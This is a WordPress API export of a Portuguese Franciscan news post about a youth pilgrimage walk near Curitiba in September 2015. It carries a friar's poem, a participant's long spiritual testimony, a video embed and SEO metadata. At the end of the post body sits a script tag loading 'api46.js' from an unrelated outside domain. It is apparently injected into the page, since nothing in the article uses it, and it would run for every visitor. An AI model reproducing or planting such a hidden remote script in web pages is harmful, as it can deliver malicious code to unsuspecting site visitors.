{"id":94592,"date":"2015-09-22T14:50:03","date_gmt":"2015-09-22T17:50:03","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=94592"},"modified":"2020-02-14T11:54:40","modified_gmt":"2020-02-14T14:54:40","slug":"94592","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/94592.html","title":{"rendered":"Caminhada Franciscana da Juventude contagia"},"content":{"rendered":"<p><strong>Frei Diego Atalino de Melo<\/strong><\/p>\n<p><em>Senti que n\u00e3o era eu que estava caminhando, mas era Jesus quem me carregava&#8230;\u201d, <\/em><em>&#8220;Esses s\u00e3o os melhores calos da minha vida&#8230;\u201d, \u201cconhecendo a hist\u00f3ria dos enfermos em Piraquara, percebi que a minha vida era muito bonita e que at\u00e9 ent\u00e3o eu n\u00e3o dava tanto valor&#8230;\u201d, \u201cdurante a caminhada vimos o amor do irm\u00e3o para conosco, em simples gestos de repartir a \u00e1gua, em dividir a lanterna, em cantar, em rezar juntos&#8230;\u201d \u201c\u00e9 tudo t\u00e3o \u00f3timo, tudo t\u00e3o revigorante, que nos d\u00e1 for\u00e7as para continuar o dia-a-dia&#8230;\u201d, \u201cas d\u00favidas que eu tinha quanto a querer ser um frade menor foram todas reduzidas a p\u00f3, pois agora, mais do que nunca, quero abra\u00e7ar este modo de vida maravilhoso\u201d. \u00a0<\/em>\u00a0Essas foram algumas das conclus\u00f5es dos jovens que percorreram os 20 km\u00a0 da IV Caminhada Franciscana da Juventude, acontecida nos dias 19 e 20 de setembro de 2015, na regi\u00e3o metropolitana de Curitiba.<\/p>\n<p>A homilia da missa, celebrada no s\u00e1bado \u00e0 noite na capela do Convento S\u00e3o Boaventura, em Campo Largo \u2013 PR, falava do testemunho de uma jovem ao concluir que a medida de Deus \u00e9 o exagero, que Deus realmente \u00e9 exagerado, abundante.<\/p>\n<p>Ao encerrar esta Caminhada Franciscana da Juventude e revendo como tudo aconteceu, nos damos conta de que de fato este \u00faltimo final de semana foi marcado pelo exagero de Deus: mais de 300 jovens participantes, mais de 36 horas sem dormir, calos nos p\u00e9s, bolhas de sangue, dores nas pernas, c\u00e2imbras, cansa\u00e7o e sono, percorrendo um itiner\u00e1rio que passava por 3 cidades. Na organiza\u00e7\u00e3o, a dedica\u00e7\u00e3o incans\u00e1vel dos frades do Regional de Curitiba, com destaque aos frades estudantes de filosofia, o envolvimento das Par\u00f3quias Bom Jesus da Ferraria e Bom Jesus dos Perd\u00f5es, Convento S\u00e3o Boaventura, Col\u00e9gio Bom Jesus e FAE, Hospital de Piraquara, Associa\u00e7\u00e3o Beneficiente Dikaion, Comunidade S\u00e3o Jos\u00e9, dos frades menores conventuais, in\u00fameras pessoas e comunidades abrindo suas comunidades para nos acolher no meio da madrugada, lanches e refei\u00e7\u00f5es preparados com carinho e em grande abund\u00e2ncia. Para o translado, 7 micro-\u00f4nibus, 3 \u00f4nibus, 3 vans e 2 carros de apoio. Motivados pela reflex\u00e3o do Frei Samuel Ferreira de Lima acerca da afirma\u00e7\u00e3o de S\u00e3o Francisco \u201cO Senhor me deu irm\u00e3os\u201d, outra marca do exagero divino foi a maneira como se criou uma grande fraternidade, n\u00e3o s\u00f3 entre os jovens cat\u00f3licos, mas tamb\u00e9m com a alegria da presen\u00e7a e participa\u00e7\u00e3o de jovens e volunt\u00e1rios evang\u00e9licos, esp\u00edritas e at\u00e9 mesmo agn\u00f3sticos, cujo objetivo era experimentar que a fraternidade universal ultrapassa os limites dos credos ou religi\u00f5es.<\/p>\n<p>Certamente para voc\u00ea que est\u00e1 lendo esta not\u00edcia tudo pode estar parecendo demasiado exagerado ou at\u00e9 mesmo uma loucura. E de fato tamb\u00e9m o foi para n\u00f3s que participamos. No entanto, quando a f\u00e9 \u00e9 a raz\u00e3o e o fundamento daquilo que fazemos, n\u00e3o h\u00e1 limites para a doa\u00e7\u00e3o e a entrega da pr\u00f3pria vida. Conforme afirma S\u00e3o Paulo, a linguagem da cruz \u00e9 loucura para os que se perdem, mas, para os que foram salvos, para n\u00f3s, \u00e9 uma for\u00e7a divina. (I Cor 1,18). E essa for\u00e7a certamente nos veio da prova de amor de Cristo por n\u00f3s, pois os jovens, carregando uma grande cruz de mais de 4 metros de altura, cujos nomes estavam inscritos nela, fizeram a profunda experi\u00eancia de encontrarem suas for\u00e7as exatamente neste sinal do amor exagerado de Deus.<\/p>\n<p>Por fim, em nome do Servi\u00e7o de Anima\u00e7\u00e3o Vocacional da Prov\u00edncia, s\u00f3 tenho a agradecer a Deus pela sua abundante generosidade em nossas vidas e miss\u00e3o, pelo envolvimento de todos os que fizeram essa Caminhada se tornar realidade e acreditam que para o amor n\u00e3o existem limites ou meias-medidas, pois, de fato, a medida de Deus \u00e9 o exagero.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2015\/09\/caminhada_2.jpg\" alt=\"caminhada_2\" width=\"820\" height=\"402\" \/><\/p>\n<hr \/>\n<h3>A medida de Deus \u00e9 o exagero!<\/h3>\n<table border=\"0\" width=\"450\" cellspacing=\"3\" cellpadding=\"3\" align=\"right\">\n<tbody>\n<tr>\n<td bgcolor=\"#E6E6E6\">\n<p style=\"padding-left: 10px;\">CAMINHADA FRANCISCANA<\/p>\n<p>A caminhada franciscana<br \/>\n\u00c9 um imenso movimento da juventude.<br \/>\nMobiliza, empolga e envolve muita gente<br \/>\nE traz paz, alegria e muita sa\u00fade.<br \/>\nAlimenta a esperan\u00e7a pela f\u00e9<br \/>\nNa a\u00e7\u00e3o engajada para que o mundo mude.<\/p>\n<p>Os jovens de muitos lugares<br \/>\nDe perto e de longe aqui vem.<br \/>\nTrazem no rosto o sorriso<br \/>\nDe quem ama e muito se quer bem.<br \/>\nLembram as caminhadas de Jesus<br \/>\nE seus ap\u00f3stolos de Nazar\u00e9 para Jerusal\u00e9m.<\/p>\n<p>Da mesma forma como os seguidores de Jesus<br \/>\nOuviam sua mensagem de amor,<br \/>\nCada jovem aqui presente traz<br \/>\nCravado em seu peito o franciscano fervor.<br \/>\nCom devo\u00e7\u00e3o e profunda alegria querem<br \/>\nAprofundar o seguimento de Cristo Senhor.<\/p>\n<p>As comunidades demonstram not\u00e1vel<br \/>\nCarinho e cuidado no acolhimento.<br \/>\nSe organizam para providenciar<br \/>\nAconchegante hospedagem e nutritivo alimento.<br \/>\nExpressam sua alegria e amizade<br \/>\nEm cada gesto a todo momento.<\/p>\n<p>Frades e lideran\u00e7as leigas com presteza<br \/>\nSe juntam neste grandioso mutir\u00e3o.<br \/>\nOutros colaboram espiritualmente<br \/>\nAtrav\u00e9s de devota e profunda ora\u00e7\u00e3o.<br \/>\nVamos construindo um mundo novo<br \/>\nMarcado pela paz, justi\u00e7a e comunh\u00e3o.<\/p>\n<p>De nossas par\u00f3quia e comunidades<br \/>\nVieram tanto jovens diferentes.<br \/>\nForam mobilizados pelas redes sociais<br \/>\nPorque vivem em constante comunica\u00e7\u00e3o.<br \/>\nTodos tem pela frente grandes e nobres ideais<br \/>\nE em Cristo buscam sempre sustenta\u00e7\u00e3o.<\/p>\n<p>L\u00e1 v\u00e3o eles mundo afora<br \/>\nBuscando o sustento e realiza\u00e7\u00e3o.<br \/>\nAprofundam o conhecimento da<br \/>\nPalavra de Deus pela leitura e medita\u00e7\u00e3o.<br \/>\nPara os mais empobrecidos caridosamente<br \/>\nEstendem os bra\u00e7os e abrem o cora\u00e7\u00e3o.<\/p>\n<p>Quem participa da caminhada franciscana<br \/>\nDeve estar sempre aberto \u00e0 gra\u00e7a da convers\u00e3o.<br \/>\nPara viver com profundidade<br \/>\nSua humana e crist\u00e3 voca\u00e7\u00e3o.<br \/>\nEm sua fam\u00edlia, na escola e na sociedade<br \/>\nSer capaz de testemunhar vida em comunh\u00e3o.<\/p>\n<p>Saber escolher uma voca\u00e7\u00e3o para seguir<br \/>\nTraz clareza e discernimento.<br \/>\nExige esp\u00edrito de doa\u00e7\u00e3o e sacrif\u00edcio<br \/>\nPar ser fiel no seu constante cumprimento.<br \/>\nCom certeza traz plena realiza\u00e7\u00e3o humana<br \/>\nPois \u00e9 de Cristo Jesus o primeiro mandamento.<\/p>\n<p>\u201cIde pelo mundo, fazei disc\u00edpulos meus\u201d:<br \/>\nEis o nosso ideal.<br \/>\nInspirados por Francisco de Assis<br \/>\nconstruamos a fraternidade universal.<br \/>\nCaminhando lado a lado com tantos<br \/>\nMovimentos que defendem uma sociedade mais igual.<br \/>\nDe Deus a gra\u00e7a recebemos<br \/>\nDe participar de grupos e comunidades.<br \/>\nConvivendo em ambientes adversos \u00e0 f\u00e9 crist\u00e3<br \/>\nTestemunhemos corajosamente ao Evangelho a fidelidade.<br \/>\nCristo Jesus nos inspire e conduza<br \/>\nUm dia \u00e0 p\u00e1tria celeste na feliz eternidade.<\/p>\n<p>Encerro estes meus versos rimados<br \/>\nInvocando as divinas b\u00ean\u00e7\u00e3os do al\u00e9m.<br \/>\nDeus proteja e acompanhe a todos,<br \/>\nSeus familiares e amigos e a mim tamb\u00e9m.<br \/>\nEm nome do Pai e do Filho<br \/>\ne do Esp\u00edrito Santo. Am\u00e9m.<\/p>\n<p>Frei Angelo Vanazzi<\/p>\n<p>Curitiba, 20 de setembro de 2015.<\/p>\n<p>\u201cDia do ga\u00facho\u201d<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><em>Deus \u00e9 realmente exagerado. O exagero \u00e9 a medida que eu sempre procurei na minha vida e que nunca consegui alcan\u00e7ar&#8230; Eu procurava a eternidade no tempo, a totalidade no amor e o m\u00e1ximo em cada resultado.<\/em><br \/>\n<em> Mas tudo isto eu procurava no mundo e somente encontrava substitutos. At\u00e9 mesmo Deus na minha tinha apar\u00eancias e medidas humanas.<\/em><br \/>\n<em> Cheguei na Caminhada com o desejo de deixar em casa as preocupa\u00e7\u00f5es e tirar umas pequenas f\u00e9rias do mundo, da universidade e mesmo daqueles amigos mais pr\u00f3ximos. Procurava um tempo livre para mim&#8230; Queria dar espa\u00e7o para a minha procura de felicidade&#8230;<\/em><br \/>\n<em> Cheguei na Caminhada sem nenhuma expectativa e sem nenhum programa, o que era algo in\u00e9dito para mim. Forcei-me a desorganizar-me ao menos uma vez e me confiar aos outros.<\/em><br \/>\n<em> Arrumando minha mochila, na noite anterior \u00e0 viagem, procurei estar atenta para carregar somente o m\u00ednimo necess\u00e1rio, mas parecia que mesmo assim ainda estava muito pesada. Ignorava que j\u00e1 h\u00e1 muito tempo eu trazia no cora\u00e7\u00e3o tantos \u201cenormes pedregulhos\u201d e que na minha cabe\u00e7a existiam montanhas de refugos que precisavam ser eliminados. Preocupei-me em esvaziar a minha bagagem material, mas me esqueci de dar uma tr\u00e9gua ao cora\u00e7\u00e3o e \u00e0 minha mente, que estavam precisando tanto de um pouco de oxig\u00eanio&#8230;<\/em><\/p>\n<p><em>Eu estava t\u00e3o imersa nos meus compromissos que evitava aos meus in\u00fameros questionamentos, e justamente por isso n\u00e3o queria deixar que o sil\u00eancio entrasse e preparasse um espa\u00e7o dentro de mim para um encontro com Deus.<\/em><\/p>\n<p><em>Para a Caminhada eu cheguei desejosa de colocar tudo isto que estava dentro de mim em ordem, mas n\u00e3o sabia por onde come\u00e7ar e sem a coragem de faz\u00ea-lo realmente.<\/em><br \/>\n<em> Toda a coragem que hoje eu encontrei chegou at\u00e9 mim ao longo do caminho, encurtando a cada momento, passo a passo, a minha dist\u00e2ncia de Cristo. Em cada momento poderia ter parado, pedido ajuda, voltado atr\u00e1s, desistido. Mas Deus estava sempre um cent\u00edmetro mais pr\u00f3ximo do que antes e eu queria realmente exagerar. Desta vez eu tinha prometido para mim mesma de ir al\u00e9m. De tocar as suas vestes como aquela hemorroisa do Evangelho e colocar as minhas m\u00e3os nas suas feridas assim como fez Tom\u00e9. A minha determina\u00e7\u00e3o e a minha teimosia foram os instrumentos que mais agradeci na minha ora\u00e7\u00e3o e dos quais Deus se serviu para firmar o meu passo em dire\u00e7\u00e3o a Ele.<\/em><\/p>\n<p><em>Os momentos de sil\u00eancio foram os meus maiores sacrif\u00edcios. Eu n\u00e3o os queria, pois eles me obrigavam a escutar tudo aquilo que eu sempre tinha colocado em modo de espera. Al\u00e9m disso, o sil\u00eancio me sugeria criar um espa\u00e7o para os projetos de Deus e eu n\u00e3o tinha inten\u00e7\u00e3o de deixar a minha vida nas m\u00e3os de nenhum outro, nem mesmo nas m\u00e3os de Deus. Mas os tempos de mudan\u00e7a estavam pr\u00f3ximos e eu mesma me aproximava sem me dar conta.<\/em><\/p>\n<p><em>Descobri na Caminhada que Deus n\u00e3o \u00e9 med\u00edocre e que n\u00e3o sabe o que s\u00e3o meias medidas, as decis\u00f5es tomadas pela metade e que ele n\u00e3o raciocina subtraindo ou dividindo. Deus somente multiplica e acrescenta. \u00c9 preciso entregar a vida para nada menos do que a Eternidade&#8230; \u00c9 preciso fazer escolhas que sejam para sempre&#8230; Esses convites s\u00e3o exagerados, provocat\u00f3rios e ao mesmo tempo me assustam. Para confiar-se em algo de terno \u00e9 necess\u00e1rio coragem. E eu n\u00e3o tinha.<\/em><\/p>\n<p><em>Durante a Caminhada n\u00e3o sabia explicar a paz que eu respirava. Ali o tempo parecia ter parado. Olhava aquelas centenas de caminhantes que Deus tinha escolhido como companheiros de viagem para mim e n\u00e3o via nada de familiar neles, e mesmo assim me sentia em casa com eles.<\/em><br \/>\n<em> Deus sabia que h\u00e1 muito tempo eu procurava uma casa no cora\u00e7\u00e3o das pessoas e que o meu desejo de encontrar esta casa teria me levado muito mais perto Dele mesmo do que eu pudesse imaginar.<\/em><\/p>\n<p><em>Percebi que Deus queria me surpreender e abaixar as minhas defesas&#8230; E ele conseguiu, sobretudo no segundo dia de Caminhada, quando come\u00e7aram as c\u00e2imbras. Foi quando eu descobri que eu n\u00e3o estava treinada, preparada ou pronta para aqueles quil\u00f4metros que eu achava que seriam f\u00e1ceis para uma jovem esportista como eu.<\/em><\/p>\n<p><em>E foi por meio daquelas c\u00e2imbras que Deus estava me mostrando que n\u00e3o existe nenhuma prepara\u00e7\u00e3o adequada para o seu encontro, pois a beleza de Deus est\u00e1 exatamente na imprevisibilidade e no n\u00e3o-c\u00e1lculo. E mesmo assim eu tentava resolver as coisas por minha pr\u00f3pria conta, evitando incomodar os outros, pedir ajudar ou mesmo parar, sem entender que Deus estava tentando me comunicar que pedir ajuda, sentir-se fraco e ser carregado pelos outros pode ser uma bela experi\u00eancia de miseric\u00f3rdia e humildade.<\/em><\/p>\n<p><em>Quando finalmente comecei a aceitar a ajuda dos outros, que tamb\u00e9m foram cuidando dos meus calos e feridas, pude apreciar a paci\u00eancia de Deus e comecei a deixar a minha teimosia de lado. Foi quando, finalmente, experimentei a beleza de deixar-se amar por Deus por meio dos outros.<\/em><\/p>\n<p><em>Por fim, a partir da experi\u00eancia da Caminhada, pude entender que o tempo que dedicamos a Deus e a n\u00f3s mesmos tem perfume de eternidade. Caminhando com tanta gente, entendi que tenho amigos pr\u00f3ximos que s\u00e3o extremamente distantes, e que agora tenho amigos t\u00e3o distantes e que s\u00e3o extremamente pr\u00f3ximos. Eu acreditava que era feliz. Agora sou feliz por crer. Pensava que poderia viver sozinha, mas agora me dei conta de que viver \u00e9 conviver. Realmente naqueles dias tudo aquilo que eu acreditava que era imposs\u00edvel na minha vida se tornou poss\u00edvel e quotidiano. E tudo isso eu devo a Deus.<\/em><br \/>\n<em> Tamb\u00e9m agrade\u00e7o aos irm\u00e3os e irm\u00e3s da Caminhada, aos frades e \u00e0s irm\u00e3s que me levaram at\u00e9 Deus. Obrigado por voc\u00eas me ensinarem que doar-se e gastar-se pelos outros \u00e9 amar a Deus.<\/em><\/p>\n<p><em>No momento da confiss\u00e3o me despi de todas as m\u00e1scaras que eu havia sempre vestido. Se algu\u00e9m me perguntasse que rosto tem a liberdade para mim hoje, eu responderia que a liberdade tem o rosto de um homem que morreu e ressuscitou por mim, o rosto de algu\u00e9m que me tirou para fora das trevas e me colocou novamente no mundo.<\/em><br \/>\n<em> A confiss\u00e3o, que para mim sempre foi um sacramento perif\u00e9rico, um acess\u00f3rio, se revelou ser a chave para as portas da vida eterna. Gastei 22 anos nos meus pecados acreditando que eu poderia me salvar por mim mesma. A descoberta daquela confiss\u00e3o me ensinou que eu n\u00e3o sou sem Deus e que sozinha n\u00e3o posso colher um campo de gr\u00e3os sem tamb\u00e9m recolher as ervas daninhas. Descobri que para vencer o pecado eu tinha necessidade de Deus. No fundo, descobri que era Deus que eu procurava quando eu procurava a felicidade, ainda que por caminhos tortuosos.<\/em><\/p>\n<p><em>Por fim, quando voltei da Caminhada, percebi que nasceu no meu cora\u00e7\u00e3o um desejo novo, nasceu o desejo de programar a minha vida a partir de Jesus Cristo. Pode parecer assustador ou mesmo algo meio distante. Mas n\u00e3o quero correr o risco de n\u00e3o aceita-lo e por isso quero fazer o Bem.<\/em><br \/>\n<em> Desta Caminhada trago para casa a verdade, a beleza e a certeza de que a medida de Deus \u00e9 o exagero. E que no fundo era este exagero de Deus que eu sempre procurei para a minha vida.<\/em><br \/>\n<em> Tudo aquilo que na minha vida era acaso se tornou providencia, todo o passado se tornou miseric\u00f3rdia e todo o presente se tornou possibilidade.<\/em><br \/>\n<em> Enfim, bem que me disseram que a Caminhada seria uma oportunidade privilegiada de fazer uma experi\u00eancia de Deus&#8230; E assim o foi! Me deixei surpreender por Deus&#8230;. Porque quem se surpreende, ser enche de luz. E quem olha para Ele, se tornar\u00e1 radiante&#8230;<\/em><br \/>\n<em> Paz e bem!<\/em><\/p>\n<p><em>Beatriz.<\/em><\/p>\n<p><iframe loading=\"lazy\" title=\"Caminhada Franciscana da Juventude_Oficial\" width=\"500\" height=\"281\" src=\"https:\/\/www.youtube.com\/embed\/ICENQz15FMI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p><img class=\"ngg_displayed_gallery mceItem\" src=\"http:\/\/franciscanos.org.br\/index.php\/nextgen-attach_to_post\/preview\/id--94593\" alt=\"\" \/><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Em Curitiba<\/p>\n","protected":false},"author":1,"featured_media":220577,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[699],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Caminhada Franciscana da Juventude contagia - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/94592.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Caminhada Franciscana da Juventude contagia - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Em Curitiba\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/94592.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2015-09-22T17:50:03+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-02-14T14:54:40+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/09\/caminhada_2.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/94592.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/09\/caminhada_2.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/09\/caminhada_2.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/94592.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/94592.html\",\"name\":\"Caminhada Franciscana da Juventude contagia - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/94592.html#primaryimage\"},\"datePublished\":\"2015-09-22T17:50:03+00:00\",\"dateModified\":\"2020-02-14T14:54:40+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/94592.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/94592.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/94592.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Caminhada Franciscana da Juventude contagia\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Caminhada Franciscana da Juventude contagia - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/94592.html","og_locale":"pt_BR","og_type":"article","og_title":"Caminhada Franciscana da Juventude contagia - Not\u00edcias - Franciscanos","og_description":"Em Curitiba","og_url":"https:\/\/franciscanos.org.br\/noticias\/94592.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2015-09-22T17:50:03+00:00","article_modified_time":"2020-02-14T14:54:40+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/09\/caminhada_2.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"12 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/94592.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/09\/caminhada_2.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/09\/caminhada_2.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/94592.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/94592.html","name":"Caminhada Franciscana da Juventude contagia - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/94592.html#primaryimage"},"datePublished":"2015-09-22T17:50:03+00:00","dateModified":"2020-02-14T14:54:40+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/94592.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/94592.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/94592.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Caminhada Franciscana da Juventude contagia"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/94592"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=94592"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/94592\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/220577"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=94592"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=94592"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=94592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}